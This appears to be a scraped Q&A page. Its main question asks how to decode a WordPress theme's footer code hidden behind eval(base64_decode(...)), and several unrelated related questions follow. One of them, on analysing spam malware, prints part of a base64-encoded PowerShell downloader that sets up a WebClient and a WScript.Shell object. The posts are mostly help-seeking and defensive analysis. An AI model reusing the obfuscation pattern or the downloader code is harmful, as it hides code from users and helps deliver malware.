I have recently installed a word press theme on my site. And i am trying to remove the credit links from the footer and sidebar, the code was in encrypted format. The theme is not functioning properly if i try to remove the links, I tried decoding using base 64 converters, but it does not helped me.
Can anyone expert let me know what kind of encoding is this and tell me how can i decode it.
Thanks in advance.
Here i am have pasted the code
http://pastebin.com/ZLGRN9ey
It's encoded in base64 if you look at the end of the file.
#eval(base64_decode($m));unset($m);
#eval executes the PHP. It looks like it is first decoded with the base64_decode function, though. Then, variable m is removed. If you want to see it decoded, do echo base64_decode($m). Even if you do this, though, it's likely that the code would still be rather obfuscated and unreadable. Try emailing the developer for the source.
Related
So i noticed someone was cheating in i game i play and i wanted the file to analyse how the cheats were written and how they work, i do not intend to use them!
I downloaded the zipped file in windows sandbox (as i want to be safe) and extracted it then opened it in vs code.
I got this message first
then when i continue the code looks like this
i am not very experienced so any help in how i can decode this or any errors i made would be appreciated thanks :)
So right now i'm working on creating an xlsx from scratch. Ive decided to dive right into the zip and replicate it through code. I've literally just copied and pasted everything exactly the same just changed the data on the backend.
I've noticed a very weird bug that seems to break the xlsx file after repacking it as a zip.
when I wrote my .rels.xml file in the back end and open it up via Browser it seems to display .rels.xml as normal.
However After going back into the original .rels.xml file of the original xlsx it is displayed as plain text, and after copying the file to the folder theres no "Would you like to replace the file" prompt almost as if it was a completely different name. Lastly it seems copying this .rels.xml from the original over to my backend , the xlsx seems to want to actually open.
Any clues as to why this behavior occurs?
EDIT: Seems like the same thing happens to the workbook.xml in the xl/_rels directory. I really have no clue why it does this... i'm not sure if its just because of the odd naming senses or not...
Not really sure what you want to achieve. Why are you not using a library that can work with the xlsx files? It is not a good idea to manipulate the xml unless you are absolutely sure what you are doing. Anyway if you still want to try use Notepad++ as the editor might change the xml encoding without warninig you. Also when you zip back use 7-zip and choose "store" or "normal-deflate" zip.
edit: I see now that you edit the xmls through code. So forget about notepad but keep an eye on the encoding
I'm actually working on ubuntu as I'm trying to parse pdf files to extract text from them, which I managed to get working (using tesseract for example), BUT as I get a 1.7 pdf file version, conversion doesn't work (I get a blank page in my 'name.txt' file).
So I was wondering if anyone knew about some magic that can solve my problem regarding this pdf version issue...
I looked pretty much everywhere I could on the web, without seeing similar issues, therefore I came to y'all.
Hope you'll find a way to help me, cause google hasn't been such a friend so far...
I've just started studying decode, and with a quiz sites. I think that they're base64 code and tried to decode in many decoded sites.
Ex: gPn8fA2pDJ9HApjA+Y9feV2RHTVv3l0BH6wDAH9CEh59vA5Q5RHT+UPOnHnwFn/R
How to decode them to ABCD and if you decode by a site, can you teach me how to use it? (only ABCD, because this's quiz site).
Thank you very much!
I'd recommend the usage of Notepad++ to encode/decode Base64 data.
It is quite simple. Just navigate to menu Complements -> MIME Tools. Before clicking the encode/decode options, make sure you have selected the data you want to (en)(de)code. In Notepad++ you can open any type of files, even executables, PDF, etc, to use the Base64 capabilities.
everybody.
Please, help me fight my little personal war against spam/malware. I'm receiving spam with obviously fake attachments in form of .doc bills or invoices.
This fake docs contain macro code that I'm able to decrypt using various tools. Generally such code tries to download an encripted text file which is actually further VBA code which, if executed, tries to download the real malware in form of an EXE file.
The encrypted text file was usually a simple base64 encoded string.
Using normal base64 encoding/decoding tools was more than enough to decrypt the content and identify the IP address from which the malware tries to download the exe virus.
Recently things have changed. Now the encrypted text file contains what is apparently base64 encoding but it is not.
The content is something like:
PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA
aQB1AGQAaABxAHcAZABxAHcAJwA7AA0ACgAkAGcAZgB5AHcAdQBnAGgAYQBtAHMAPQAnADEA
MgBqAGgAMwBnADEAMgBoACAAMQAyAGcAMwBqAGgAMQAyADMAMQAyADMAJwA7AA0ACgAkAGQA
...
aQBoAHcAZAB1AGkAcQB3AHUAZABxAHcAaQAgAGgAZABxAHcAaABkACIADQAKAFMAZQB0ACAA
bwBiAGoAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAFMA
YwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQA8AC8AcwB0AGUAeAB0ADMAPgA=
which resembles base64 encoding. But if you try and decode it using base64, you get something like:
<^#t^#e^#x^#t^#1^#0^#>^#$^#h^#y^#g^#q^#u^#d^#g^#a^#h^#s^#=^#'^#n^#u^#d^#q^#h^#w^#i^#u^#d^#h^#q^#w^#d^#q^#w^#'^#;^#
^#
^#$^#g^#f^#y^#w^#u^#g^#h^#a^#m^#s^#=^#'^#1^#2^#j^#h^#3^#g^#1^#2^#h^# ^#1^#2^#g^#3^#j^#h^#1^#2^#3^#1^#2^#3^#'^#;^#
^#
^#$^#d^#o^#w^#n^# ^#=^# ^#N^#e^#w^#-^#O^#b^#j^#e^#c^#t^# ^#S^#y^#s^#t^#e^#m^#.^#N^#e^#t^#.^#W^#e^#b^#C^#l^#i^#e^#n^#t^#;^#
instead of plain text (the VBS code that downloads the exe file).
Can anyone help me find the way to decode such dirt?
Thanks in advance!